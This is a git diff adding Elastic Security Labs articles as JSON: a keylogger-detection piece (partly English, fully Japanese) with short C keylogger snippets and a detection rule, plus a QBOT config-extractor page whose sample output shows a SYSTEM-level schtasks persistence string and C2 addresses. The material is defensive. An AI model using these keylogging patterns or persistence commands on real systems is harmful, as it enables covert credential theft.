Suspicious CallStack](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystrokes_input_capture_from_suspicious_callstack.toml)\n - [Keystrokes Input Capture from Unsigned DLL](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystrokes_input_capture_from_unsigned_dll.toml)\n - [Keystrokes Input Capture via SetWindowsHookEx](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystrokes_input_capture_via_setwindowshookex.toml)\n\nWith this new set of capabilities, Elastic Defend can provide comprehensive monitoring and detection of keylogging activity, enhancing the security and protection of Windows endpoints against these threats.\n\n### Detecting Windows keyloggers\n\nNext, let’s walk through an example of how the detection works in practice. We'll detect a keylogger using the Raw Input Model with Elastic Defend. For this example, we prepared a simple PoC keylogger named ```Keylogger.exe``` that uses the ```RegisterRawInputDevices``` API and executed it in our test environment (※5). (※5: The execution environment is Windows 10 Version 22H2 19045.4412, the latest version available at the time of writing.)\n\n\n \nShortly after the keylogger was executed, a detection rule ([Keystroke Input Capture via RegisterRawInputDevices](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystroke_input_capture_via_registerrawinputdevices.toml)) was triggered on the endpoint, raising an alert. Further details of this alert can be viewed within Kibana.\n\n\n\nHere are the details of the detection rule; note the specific API referenced in the query. 
\n\n``` sql\nquery = '''\napi where\n process.Ext.api.name == \"RegisterRawInputDevices\" and not process.code_signature.status : \"trusted\" and\n process.Ext.api.parameters.usage : (\"HID_USAGE_GENERIC_KEYBOARD\", \"KEYBOARD\") and\n process.Ext.api.parameters.flags : \"*INPUTSINK*\" and process.thread.Ext.call_stack_summary : \"?*\" and\n process.thread.Ext.call_stack_final_user_module.hash.sha256 != null and process.executable != null and\n not process.thread.Ext.call_stack_final_user_module.path :\n (\"*\\\\program files*\", \"*\\\\windows\\\\system32\\\\*\", \"*\\\\windows\\\\syswow64\\\\*\",\n \"*\\\\windows\\\\systemapps\\\\*\",\n \"*\\\\users\\\\*\\\\appdata\\\\local\\\\*\\\\kumospace.exe\",\n \"*\\\\users\\\\*\\\\appdata\\\\local\\\\microsoft\\\\teams\\\\current\\\\teams.exe\") and \n not process.executable : (\"?:\\\\Program Files\\\\*.exe\", \"?:\\\\Program Files (x86)\\\\*.exe\")\n'''\n```\n\nThis rule raises an alert when an unsigned process, or a process signed by an untrusted signer, calls the ```RegisterRawInputDevices``` API to capture keystrokes. More specifically, Elastic Defend monitors the arguments passed to the ```RegisterRawInputDevices``` API, particularly the members of the [```RAWINPUTDEVICE``` structure](https://learn.microsoft.com/en-us/windows/win32/api/winuser/ns-winuser-rawinputdevice), which is the first argument of this API.\n\nThis raises an alert when these argument values indicate an attempt to capture keyboard input. The logs of the ```RegisterRawInputDevices``` API can also be viewed within Kibana.\n\n\n\n### Data Collected During Windows API Calls\n\nDue to space constraints, this article does not cover all of the detection rules and API details that were added. However, we will briefly describe the data that Elastic Defend collects during calls to the relevant Windows APIs. 
For further explanation of each item, please refer to the Elastic Common Schema (ECS) mapping detailed in [```custom_api.yml```](https://github.com/elastic/endpoint-package/blob/main/custom_schemas/custom_api.yml).\n\n| API Name | Field | Description | Example |\n| --- | --- | --- | --- |\n| GetAsyncKeyState | process.Ext.api.metadata.ms_since_last_keyevent | Elapsed time in milliseconds since the last GetAsyncKeyState event. | 94 |\n| GetAsyncKeyState | process.Ext.api.metadata.background_callcount | Number of GetAsyncKeyState API calls, including unsuccessful ones, since the last successful GetAsyncKeyState call. | 6021 |\n| SetWindowsHookEx | process.Ext.api.parameters.hook_type | Type of hook procedure to be installed. | \"WH_KEYBOARD_LL\" |\n| SetWindowsHookEx | process.Ext.api.parameters.hook_module | DLL containing the hook procedure. | \"c:\\\\windows\\\\system32\\\\taskbar.dll\" |\n| SetWindowsHookEx | process.Ext.api.parameters.procedure | The memory address of the hook procedure or function. | 2431737462784 |\n| SetWindowsHookEx | process.Ext.api.metadata.procedure_symbol | Summary of the hook procedure. | \"taskbar.dll\" |\n| RegisterRawInputDevices | process.Ext.api.metadata.return_value | Return value of the RegisterRawInputDevices API call. | 1 |\n| RegisterRawInputDevices | process.Ext.api.parameters.usage_page | Top-level collection (Usage Page) of the device; first member of the RAWINPUTDEVICE structure. | \"GENERIC\" |\n| RegisterRawInputDevices | process.Ext.api.parameters.usage | Specific device (Usage) within the Usage Page; second member of the RAWINPUTDEVICE structure. | \"KEYBOARD\" |\n| RegisterRawInputDevices | process.Ext.api.parameters.flags | Mode flag that specifies how to interpret the information provided by UsagePage and Usage; third member of the RAWINPUTDEVICE structure. 
| \"INPUTSINK\" |\n| RegisterRawInputDevices | process.Ext.api.metadata.windows_count | Number of windows owned by the caller thread. | 2 |\n| RegisterRawInputDevices | process.Ext.api.metadata.visible_windows_count | Number of visible windows owned by the caller thread. | 0 |\n| RegisterRawInputDevices | process.Ext.api.metadata.thread_info_flags | Thread info flags. | 16 |\n| RegisterRawInputDevices | process.Ext.api.metadata.start_address_module | Name of the module associated with the starting address of a thread. | \"C:\\\\Windows\\\\System32\\\\DellTPad\\\\ApMsgFwd.exe\" |\n| RegisterRawInputDevices | process.Ext.api.metadata.start_address_allocation_protection | Memory protection attributes associated with the starting address of a thread. | \"RCX\" |\n\n## Conclusion\n\nIn this article, we introduced the keylogger and keylogging detection features for Windows environments that were added starting from Elastic Defend 8.12. Specifically, by monitoring calls to representative Windows APIs related to keylogging, we have integrated a behavioral keylogging detection approach that does not rely on signatures. To ensure accuracy and reduce the false positive rate, we have created this feature and new rules based on months of research.\n\nIn addition to keylogging-related APIs, Elastic Defend also monitors [other APIs commonly used by malicious actors, such as those for memory manipulation](https://www.elastic.co/security-labs/doubling-down-etw-callstacks), providing multi-layered protection. If you are interested in Elastic Security and Elastic Defend, please check out the [product page](https://www.elastic.co/security) and [documentation](https://www.elastic.co/videos/intro-elastic-security).\n"
+ },
+ "title": "Protecting your devices from information theft",
+ "slug": "protecting-your-devices-from-information-theft-keylogger-protection",
+ "subtitle": "Keylogger detection using Windows API behaviors",
+ "date": "2024-05-30",
+ "description": "In this article, we will introduce the keylogger and keylogging detection features added this year to Elastic Defend (starting from version 8.12), which is responsible for endpoint protection in Elastic Security.",
+ "author": [
+ {
+ "slug": "asuka-nakajima"
+ }
+ ],
+ "image": "Security Labs Images 10.jpg",
+ "category": [
+ {
+ "slug": "security-operations"
+ },
+ {
+ "slug": "security-research"
+ },
+ {
+ "slug": "detection-science"
+ }
+ ],
+ "tags": [
+ "detection engineering",
+ "threat hunting",
+ "threat detection"
+ ]
+ },
+ "id": "security_labs_content-protecting_your_devices_from_information_theft_keylogger_protection-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-protecting_your_devices_from_information_theft_keylogger_protection_jp-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-protecting_your_devices_from_information_theft_keylogger_protection_jp-md.json
new file mode 100644
index 00000000000..68cf7e4535c
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-protecting_your_devices_from_information_theft_keylogger_protection_jp-md.json
@@ -0,0 +1,36 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"情報窃取から端末を守る\"\nslug: \"protecting-your-devices-from-information-theft-keylogger-protection-jp\"\ndate: \"2024-05-30\"\nsubtitle: \"Windows APIの挙動を用いたキーロガー検知\"\ndescription: \"本記事ではElastic Securityにおいて、エンドポイント保護を担っているElastic Defendに今年(バージョン8.12より)新たに追加された、キーロガーおよびキーロギング検出機能について紹介します。\"\nauthor:\n- slug: asuka-nakajima\nimage: \"Security Labs Images 10.jpg\"\ncategory:\n - slug: security-operations\n - slug: security-research\n - slug: detection-science\ntags:\n - detection engineering\n - threat hunting\n - threat detection\n---\n\n本記事ではElastic Securityにおいて、エンドポイント保護を担っているElastic Defendに今年(バージョン[8.12](https://www.elastic.co/guide/en/security/8.12/release-notes-header-8.12.0.html#enhancements-8.12.0)より)新たに追加された、キーロガーおよびキーロギング検出機能について紹介します。\n\n## はじめに\n\nElastic Defend 8.12より、Windows上で動作するキーロガーおよび、キーロギング機能を備えたマルウェア(情報窃取型マルウェアや、リモートアクセス型トロイの木馬、通称RAT)の検知の強化を目的に、キーロガーが使用する代表的なWindows API群の呼び出しを監視・記録する機能が追加されました。本記事ではこの新機能に焦点を当て、その技術的な詳細を解説します。加えて、本機能に付随して新たに作成された振る舞い検知ルール(Prebuilt rule)についても紹介します。\n\n### キーロガーとはなにか?どのような危険性があるのか?\n\nキーロガーとは、コンピュータ上で入力されたキーの内容を監視および記録(キーロギング)するソフトウェアの一種です(※1)。キーロガーは、ユーザのモニタリングなどの正当な理由で利用されることもありますが、攻撃者によって頻繁に悪用されるソフトウェアです。具体的には、ユーザがキーボード経由で入力した認証情報やクレジットカード情報、各種機密情報などのセンシティブな情報の窃取などに際に使われます。(※1: パソコンにUSB等で直接取り付けるようなハードウェア型のキーロガーもありますが、本記事ではソフトウェア型のキーロガーに焦点を当てます。)\n\nキーロガーを通じて入手したセンシティブな情報は、金銭の窃取やさらなるサイバー攻撃の足がかりに悪用されます。それゆえに、キーロギング行為自体は直接的にコンピュータに被害をおよばさないものの、続くサイバー攻撃の被害を食い止めるためにも、早期の検知が非常に重要だと言えます。\n\nキーロギング機能を持つマルウェアは多々あり、特にRAT、情報窃取型マルウェア、バンキングマルウェアといった種類のマルウェアにキーロギング機能が搭載されている場合があることが確認されています。有名なマルウェアでキーロギング機能を有するものとしては[Agent Tesla](https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla)や[Lokibit](https://malpedia.caad.fkie.fraunhofer.de/details/apk.lokibot)、そして[SnakeKeylogger](https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger)などが挙げられます。\n\n### 
いかにして入力した文字を盗み取っているのか?\n\nでは次に、キーロガーはいかにしてユーザがキーボードから入力した文字を、ユーザに気づかれること無く盗み取っているのかを、技術的な観点から説明していきます。キーロガー自体は、あらゆるOS環境(Windows/Linux/macOSやモバイルデバイス)で存在しうるものではありますが、本記事ではWindowsのキーロガーに焦点を絞って解説します。特にWindows APIや機能を使用してキー入力を取得する4つの異なるタイプのキーロガーについて解説します。\n\n一点補足としては、ここでキーロギングの手法について説明しているのは、あくまで本記事後半で紹介している、新しい検知機能についての理解を深めていただくためです。そのため、例として掲載しているコードはあくまで単なる例であり、実際にそのまま動くコードが掲載されている訳ではありません(※3)。\n\n(※2: Windows上で動作するキーロガーは、カーネル空間(OS)側に設置されるものと、通常のアプリケーションと同じ領域(ユーザ空間)に設置されるものに大別されます。本記事では、後者のタイプを取り上げます。 )\n(※3: 以下に掲載されている例のコードを元にキーロガーを作成し悪用した場合、弊社では対応、および、責任について負いかねます 。)\n\n 1. ポーリング型キーロガー\n \nこのタイプのキーロガーは、キーボードの各キーの状態(キーが押された否か)を短い間隔(1秒よりはるかに短い間隔)で定期的に確認します。そして前回の確認以降に、新たに押されたキーがあることが判明した場合、その押されたキーの文字の情報を記録・保存します。この一連の流れを繰り返すことで、キーロガーは、ユーザが入力した文字列の情報を取得しているのです。\n\nポーリング型のキーロガーは、キーの入力状態をチェックするWindowsのAPIを利用して実装されており、代表的には [```GetAsyncKeyState```](https://learn.microsoft.com/ja-jp/windows/win32/api/winuser/nf-winuser-getasynckeystate) APIが利用されます。このAPIは、特定のキーが現在押されているか否かに加えて、その特定のキーが前回のAPI呼び出し以降押されたか否かの情報を取得することが出来ます。以下が```GetAsyncKeyState``` APIを使ったポーリング型キーロガーの簡単な例です。\n\n``` C\nwhile(true)\n{\n for (int key = 1; key <= 255; key++)\n {\n if (GetAsyncKeyState(key) & 0x01)\n {\n SaveTheKey(key, \"log.txt\");\n }\n }\n Sleep(50);\n}\n```\n\nポーリング(```GetAsyncKeyState```)を用いてキー押下状態を取得する手法は、古くから存在する典型的なキーロギングの手法として知られているだけでなく、今でもマルウェアによって使われていることが確認されています。\n \n 2. 
フッキング型キーロガー\n \nフッキング型キーロガーは、ポーリング型キーロガーと同じく、古くから存在する典型的な種類のキーロガーです。ここではまず「そもそもフックとは何か?」について説明します。\n\nフックとは大雑把に言うと「アプリケーションの特定の処理に、独自の処理を割り込ませる仕組み」のことを指す言葉です。そして、フックを使って独自の処理を割り込ませることを「フックする」とも言います。Windowsでは、アプリケーションに対するキー入力などのメッセージ(イベント)をフックすることが出来る仕組みが用意されており、この仕組みは[SetWindowsHookEx](https://learn.microsoft.com/ja-jp/windows/win32/api/winuser/nf-winuser-setwindowshookexa) APIを通じて利用することが出来ます。以下が```SetWindowsHookEx``` APIを使ったフッキング型キーロガーの簡単な例です。\n\n``` C\nHMODULE hHookLibrary = LoadLibraryW(L\"hook.dll\");\nFARPROC hookFunc = GetProcAddress(hHookLibrary, \"SaveTheKey\");\n\nHHOOK keyboardHook = NULL;\n \nkeyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL,\n (HOOKPROC)hookFunc,\n hHookLibrary,\n 0);\n```\n\n 3. Raw Input Modelを用いたキーロガー\n \nこのタイプのキーロガーは、キーボードなどの入力デバイスから得られた、生の入力データ(Raw Input)を取得し、それを保存・記録します。このキーロガーの詳細について説明する前に、まずWindowsにおける入力方式である「Original Input Model」と「Raw Input Model」について理解する必要があります。以下がそれぞれの入力方式についての説明です。\n\n - **Original Input Model**: キーボードなどの入力デバイスから入力されたデータを、一度OSを介して必要な処理をした後、アプリケーション側に届ける方式\n - **Raw Input Model**: キーボードなどの入力デバイスから入力されたデータを、そのままアプリケーション側が直接受け取る方式\n\nWindowsでは当初、Original Input Modelのみが使われていました。しかしWindows XP以降に、おそらくは入力デバイスの多様化などの要因から、Raw Input Modelが導入されました。Raw Input Modelでは、[```RegisterRawInputDevices```](https://learn.microsoft.com/ja-jp/windows/win32/api/winuser/nf-winuser-registerrawinputdevices) APIを使い、入力データを直接受け取りたい入力デバイスを登録します。そしてその後、[```GetRawInputData```](https://learn.microsoft.com/ja-jp/windows/win32/api/winuser/nf-winuser-getrawinputdata) APIを用いて生データを取得します。\n以下がこれらのAPIを使った、Raw Input Modelを用いたキーロガーの簡単な例です。\n\n``` C\nLRESULT CALLBACK WndProc(HWND hWnd, UINT uMessage, WPARAM wParam, LPARAM lParam)\n{\n\n UINT dwSize = 0;\n RAWINPUT* buffer = NULL;\n\n switch (uMessage)\n {\n case WM_CREATE:\n RAWINPUTDEVICE rid;\n rid.usUsagePage = 0x01; // HID_USAGE_PAGE_GENERIC\n rid.usUsage = 0x06; // HID_USAGE_GENERIC_KEYBOARD\n rid.dwFlags = RIDEV_NOLEGACY | RIDEV_INPUTSINK;\n rid.hwndTarget = hWnd;\n RegisterRawInputDevices(&rid, 1, 
sizeof(rid));\n break;\n case WM_INPUT:\n GetRawInputData((HRAWINPUT)lParam, RID_INPUT, NULL,\n&dwSize, sizeof(RAWINPUTHEADER));\n\n buffer = (RAWINPUT*)HeapAlloc(GetProcessHeap(), 0, dwSize);\n\n if (GetRawInputData((HRAWINPUT)lParam, RID_INPUT, buffer, \n&dwSize, sizeof(RAWINPUTHEADER)))\n {\n if (buffer->header.dwType == RIM_TYPEKEYBOARD)\n {\n SaveTheKey(buffer, \"log.txt\");\n }\n }\n HeapFree(GetProcessHeap(), 0, buffer);\n break;\n default:\n return DefWindowProc(hWnd, uMessage, wParam, lParam);\n }\n return 0;\n}\n```\n\nこの例では、最初に生入力を受け取りたい入力デバイスを```RegisterRawInputDevices```を用いて、登録します。ここでは、キーボードの生入力データを受け取るように設定・登録しています。\n\n 4. ```DirectInput```を用いたキーロガー\n \n最後に、```DirectInput```を用いたキーロガーについて説明します。このキーロガーは簡単に言えばMicrosoft DirectXの機能を悪用したキーロガーです。DirectXとは、ゲームや動画などのマルチメディア関連の処理を扱うためのAPI群の総称(ライブラリ)です。\n\nゲームにおいて、ユーザから各種入力が取得できることは必須機能と言って良いことから、DirectXにおいてもユーザの入力を処理するAPI群が提供されています。そして、DirectXのバージョン8以前に提供されていたそれらAPI群のことを「DirectInput」と呼びます。以下が```DirectInput```に関連するAPIを使ったキーロガーの簡単な例です。補足ですが、```DirectInput```を用いてキーを取得する際、裏では```RegisterRawInputDevices``` APIが呼ばれています。\n\n``` C\nLPDIRECTINPUT8\t\tlpDI = NULL;\nLPDIRECTINPUTDEVICE8\tlpKeyboard = NULL;\n\nBYTE key[256];\nZeroMemory(key, sizeof(key));\n\nDirectInput8Create(hInstance, DIRECTINPUT_VERSION, IID_IDirectInput8, (LPVOID*)&lpDI, NULL);\nlpDI->CreateDevice(GUID_SysKeyboard, &lpKeyboard, NULL);\nlpKeyboard->SetDataFormat(&c_dfDIKeyboard);\nlpKeyboard->SetCooperativeLevel(hwndMain, DISCL_FOREGROUND | DISCL_NONEXCLUSIVE | DISCL_NOWINKEY);\n\nwhile(true)\n{\n HRESULT ret = lpKeyboard->GetDeviceState(sizeof(key), key);\n if (FAILED(ret)) {\n lpKeyboard->Acquire();\n lpKeyboard->GetDeviceState(sizeof(key), key);\n }\n SaveTheKey(key, \"log.txt\");\t\n Sleep(50);\n}\n```\n\n## Windows API呼び出しを監視してキーロガーを検出する\n\nElastic Defendでは、Event Tracing for Windows (ETW ※4)を用いて、前述の種類のキーロガーを検知しています。具体的には、関連するWindows API群の呼び出しを監視し、その挙動のログを取得することで実現しています。監視するWindows API群と、付随して新規に作成したキーロガーの検知ルールは以下です。(※4 
一言でいうとWindowsが提供する、アプリケーションやデバイスドライバなどのシステム側のコンポーネントを、トレースおよびロギングする仕組み。)\n\n### 監視するWindows API群:\n\n - [GetAsyncKeyState](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getasynckeystate)\n - [SetWindowsHookEx](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setwindowshookexw)\n - [RegisterRawInputDevice](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-registerrawinputdevices)\n\n### 追加したキーロガー検知ルール一覧:\n\n - [GetAsyncKeyState API Call from Suspicious Process](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_getasynckeystate_api_call_from_suspicious_process.toml)\n - [GetAsyncKeyState API Call from Unusual Process](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_getasynckeystate_api_call_from_unusual_process.toml)\n - [Keystroke Input Capture via DirectInput](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystroke_input_capture_via_directinput.toml)\n - [Keystroke Input Capture via RegisterRawInputDevices](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystroke_input_capture_via_registerrawinputdevices.toml)\n - [Keystroke Messages Hooking via SetWindowsHookEx](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystroke_messages_hooking_via_setwindowshookex.toml)\n - [Keystrokes Input Capture from a Managed Application](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystrokes_input_capture_from_a_managed_application.toml)\n - [Keystrokes Input Capture from a Suspicious Module](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystrokes_input_capture_from_a_suspicious_module.toml)\n - [Keystrokes Input Capture from Suspicious 
CallStack](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystrokes_input_capture_from_suspicious_callstack.toml)\n - [Keystrokes Input Capture from Unsigned DLL](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystrokes_input_capture_from_unsigned_dll.toml)\n - [Keystrokes Input Capture via SetWindowsHookEx](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystrokes_input_capture_via_setwindowshookex.toml)\n\n新規に追加した機能および検知ルールにより、Elastic Defendにてキーロガー・キーロギングの包括的な監視と検出が可能となり、これらの脅威に対するWindowsエンドポイントのセキュリティと保護の強化を実現しました。\n\n### Windowsのキーロガーを検知する\n\n次に実際の検知の様子をお見せします。例として、Raw Input Modelを用いたキーロガーをElastic Defendで検出してみます。ここでは```RegisterRawInputDevices``` APIを用いた簡易的なキーロガー「Keylogger.exe」を用意し、テスト環境で実行してみました※5。(※5 実行環境はWindows 10の執筆時点の最新版であるWindows 10 Version 22H2 19045.4412です。)\n\n\n\nキーロガーを実行した直後に、検知ルール([Keystroke Input Capture via ```RegisterRawInputDevices```](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystroke_input_capture_via_registerrawinputdevices.toml))が発動し、エンドポイント側でアラートが上がりました。このアラートのさらなる詳細はKibana上から見ることが出来ます。\n\n\n\n以下が検知ルールの詳細です。検知に使われているAPIの部分を中心に説明します。\n\n``` sql\nquery = '''\napi where\n process.Ext.api.name == \"RegisterRawInputDevices\" and not process.code_signature.status : \"trusted\" and\n process.Ext.api.parameters.usage : (\"HID_USAGE_GENERIC_KEYBOARD\", \"KEYBOARD\") and\n process.Ext.api.parameters.flags : \"*INPUTSINK*\" and process.thread.Ext.call_stack_summary : \"?*\" and\n process.thread.Ext.call_stack_final_user_module.hash.sha256 != null and process.executable != null and\n not process.thread.Ext.call_stack_final_user_module.path :\n (\"*\\\\program files*\", \"*\\\\windows\\\\system32\\\\*\", \"*\\\\windows\\\\syswow64\\\\*\",\n \"*\\\\windows\\\\systemapps\\\\*\",\n \"*\\\\users\\\\*\\\\appdata\\\\local\\\\*\\\\kumospace.exe\",\n 
\"*\\\\users\\\\*\\\\appdata\\\\local\\\\microsoft\\\\teams\\\\current\\\\teams.exe\") and \n not process.executable : (\"?:\\\\Program Files\\\\*.exe\", \"?:\\\\Program Files (x86)\\\\*.exe\")\n'''\n```\n\nこのアラートは簡単に言うと「署名されていないプロセス」または「署名されているが、その署名者が信頼できないプロセス」が、キー入力を取得する目的で```RegisterRawInputDevices``` APIを呼び出した時に発せられるアラートです。```RegisterRawInputDevices``` APIが呼び出された際の引数の情報に着目しており、より具体的にはAPIの第一引数である、[RAWINPUTDEVICE](https://learn.microsoft.com/ja-jp/windows/win32/api/winuser/ns-winuser-rawinputdevice)構造体のメンバの情報を検知に用いています。\n\nこの引数の値が、キーボード入力の取得を試みていることを示している場合、キーロガーが実行されたと見なして、アラートを上げるようになっています。 ```RegisterRawInputDevices``` APIのログはKibana上でも確認できます。\n\n\n\n### 各Windows APIの呼び出しの際に取得しているデータ\n\n分量の都合で、追加したすべての検知ルールとAPIの詳細については本記事では説明しません。ですが最後に、対象のWindows APIの呼び出しの際にElastic Defend側で取得しているデータについて、簡単にご紹介します。各項目についてさらに知りたい方は、[custom_api.yml](https://github.com/elastic/endpoint-package/blob/main/custom_schemas/custom_api.yml)に記載されているElastic Common Schema(ECS)とのマッピングをご参照ください。\n\n| API名 | フィールド | 説明(原文を日本語訳したもの) | 例 |\n| --- | --- | --- | --- |\n| GetAsyncKeyState | process.Ext.api.metadata.ms_since_last_keyevent | このパラメーターは、最後の GetAsyncKeyState イベントからの経過時間をミリ秒で示します。 | 94 |\n| GetAsyncKeyState | process.Ext.api.metadata.background_callcount | このパラメーターは、最後に成功した GetAsyncKeyState 呼び出しからの間に行われた、失敗した呼び出しも含めたすべての GetAsyncKeyState API 呼び出しの回数を示します。 | 6021 |\n| SetWindowsHookEx | process.Ext.api.parameters.hook_type | Tインストールするフックの種類 | \"WH_KEYBOARD_LL\"\n| SetWindowsHookEx | process.Ext.api.parameters.hook_module | フック先の処理を保有するDLL | \"c:\\\\windows\\\\system32\\\\taskbar.dll\"\n| SetWindowsHookEx | process.Ext.api.parameters.procedure | フック先となる処理や関数のメモリアドレス | 2431737462784 |\n| SetWindowsHookEx | process.Ext.api.metadata.procedure_symbol | フック先の処理の要約 | \"taskbar.dll\" |\n| RegisterRawInputDevices | process.Ext.api.metadata.return_value | RegisterRawInputDevices API 呼び出しの戻り値 | 1 |\n| RegisterRawInputDevices | process.Ext.api.parameters.usage_page | このパラメーターはデバイスのトップレベルコレクション(Usage 
Page)を示す。RAWINPUTDEVICE 構造体の最初のメンバ | \"GENERIC\" |\n| RegisterRawInputDevices | process.Ext.api.parameters.usage | このパラメーターは、Usage Page 内の特定のデバイス(Usage)を示します。RAWINPUTDEVICE 構造体の2番目のメンバ | \"KEYBOARD\" |\n| RegisterRawInputDevices | process.Ext.api.parameters.flags | UsagePageとUsageによって提供される情報をどのように解釈するかを指定するモードフラグ。RAWINPUTDEVICE 構造体の3番目のメンバ | \"INPUTSINK\" |\n| RegisterRawInputDevices | process.Ext.api.metadata.windows_count | 呼び出し元スレッドが所有するウィンドウの数 | 2 |\n| RegisterRawInputDevices | process.Ext.api.metadata.visible_windows_count | 呼び出し元スレッドが所有する表示されているウィンドウの数 | 0 |\n| RegisterRawInputDevices | process.Ext.api.metadata.thread_info_flags | スレッドの情報を表すフラグ | 16 |\n| RegisterRawInputDevices | process.Ext.api.metadata.start_address_module | スレッドの開始アドレスに紐づくモジュールの名前 | \"C:\\\\Windows\\\\System32\\\\DellTPad\\\\ApMsgFwd.exe\" |\n| RegisterRawInputDevices | process.Ext.api.metadata.start_address_allocation_protection | スレッドの開始アドレスに紐づくメモリ保護属性 | \"RCX\" |\n\n## まとめ\n\n本記事では、Elastic Defend 8.12にて導入された、Windows環境におけるキーロガーおよびキーロギング検知機能についてご紹介しました。具体的には、キーロギングに関連する代表的なWindows API群の呼び出しを監視することで、シグネチャに依存しない、振る舞い検知によるキーロガー検出を実現しました。精度を高め、誤検知率を減らすために、数ヶ月にわたる研究・調査をもとにこの機能と新しいルールを開発しました。\n\nElastic Defendではキーロガー関連のAPI以外にも、攻撃者に一般的に利用されるメモリ操作等の[API群なども監視すること](https://www.elastic.co/security-labs/doubling-down-etw-callstacks)で、多層的な防御を実現しております。Elastic Security および Elastic Defendについて気になった方はぜひ[製品ページ](https://www.elastic.co/jp/security)や[ドキュメント](https://www.elastic.co/jp/videos/intro-elastic-security)を御覧頂ければ幸いです。\n"
+ },
+ "title": "情報窃取から端末を守る",
+ "slug": "protecting-your-devices-from-information-theft-keylogger-protection-jp",
+ "subtitle": "Windows APIの挙動を用いたキーロガー検知",
+ "date": "2024-05-30",
+ "description": "本記事ではElastic Securityにおいて、エンドポイント保護を担っているElastic Defendに今年(バージョン8.12より)新たに追加された、キーロガーおよびキーロギング検出機能について紹介します。",
+ "author": [
+ {
+ "slug": "asuka-nakajima"
+ }
+ ],
+ "image": "Security Labs Images 10.jpg",
+ "category": [
+ {
+ "slug": "security-operations"
+ },
+ {
+ "slug": "security-research"
+ },
+ {
+ "slug": "detection-science"
+ }
+ ],
+ "tags": [
+ "detection engineering",
+ "threat hunting",
+ "threat detection"
+ ]
+ },
+ "id": "security_labs_content-protecting_your_devices_from_information_theft_keylogger_protection_jp-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-qbot_configuration_extractor-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-qbot_configuration_extractor-md.json
new file mode 100644
index 00000000000..8850a93e9f1
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-qbot_configuration_extractor-md.json
@@ -0,0 +1,30 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"QBOT Configuration Extractor\"\nslug: \"qbot-configuration-extractor\"\ndate: \"2022-12-06\"\nsubtitle: \"Configuration extraction tool for QBOT malware\"\ndescription: \"Python script to extract the configuration from QBOT samples.\"\nauthor:\n - slug: elastic-security-labs\nimage: \"tools-image.jpg\"\ncategory:\n - slug: tools\ntags:\n - qbot\n - ref3726\n - qakbot\n---\n\nPython script to extract the configuration from QBOT samples.\n\n[Download qbot-config-extractor.tar.gz](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blta4523f3b586ba6ac/62e16e26d2f5267009ac073a/qbot-config-extractor.tar.gz)\n\n## Getting Started\n\nThis tool provides a Python module and command line tool that will extract configurations from the QBOT malware samples and dump the results to screen.\n\n> For information on the QBOT attack pattern and malware analysis, check out our blog posts detailing this:\n>\n> - [Exploring the QBOT Attack Pattern](https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern)\n> - [QBOT Malware Analysis](https://www.elastic.co/security-labs/qbot-malware-analysis)\n\n### Docker\n\nWe can easily run the extractor with Docker, first we need to build the image:\n\n```\ndocker build . 
-t qbot-config-extractor\n```\n\nThen we run the container with the **-v** flag to map a host directory to the docker container directory:\n\n```\ndocker run -ti --rm -v \\\n\"$(pwd)/data\":/data qbot-config-extractor:latest -d /data/\n```\n\nWe can either specify a single sample with **-f** option or a directory of samples with **-d**.\n\n```\n$ docker run -ti --rm -v $(pwd)/data:/data qbot-config-extractor:latest -f data/c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a\n\n=== Strings ===\n# Blob address: 0x100840a0\n# Key address: 0x10084040\n[0x0]: ProgramData\n[0xc]: /t4\n[0x10]: EBBA\n[0x15]: netstat -nao\n[0x22]: jHxastDcds)oMc=jvh7wdUhxcsdt2\n[0x40]: schtasks.exe /Create /RU \"NT AUTHORITY\\SYSTEM\" /SC ONSTART /TN %u /TR \"%s\" /NP /F\n\n...truncated...\n\n=== RESOURCE 1 ===\nKey: b'\\\\System32\\\\WindowsPowerShel1\\\\v1.0\\\\powershel1.exe'\nType: DataType.DOMAINS\n41.228.22.180:443\n47.23.89.62:995\n176.67.56.94:443\n103.107.113.120:443\n148.64.96.100:443\n47.180.172.159:443\n181.118.183.98:443\n\n...truncated...\n```\n\n### Running it Locally\n\nAs mentioned above, Docker is the recommended approach to running this project, however you can also run this locally. This project uses [Poetry](https://python-poetry.org/) to manage dependencies, testing, and metadata. If you have Poetry installed already, from this directory, you can simply run the following commands to run the tool. This will setup a virtual environment, install the dependencies, activate the virtual environment, and run the console script.\n\n```\npoetry lock\npoetry install\npoetry shell\nqbot-config-extractor -h\n```\n\nOnce that works, you can do the same sort of things as mentioned in the Docker instructions above.\n"
+ },
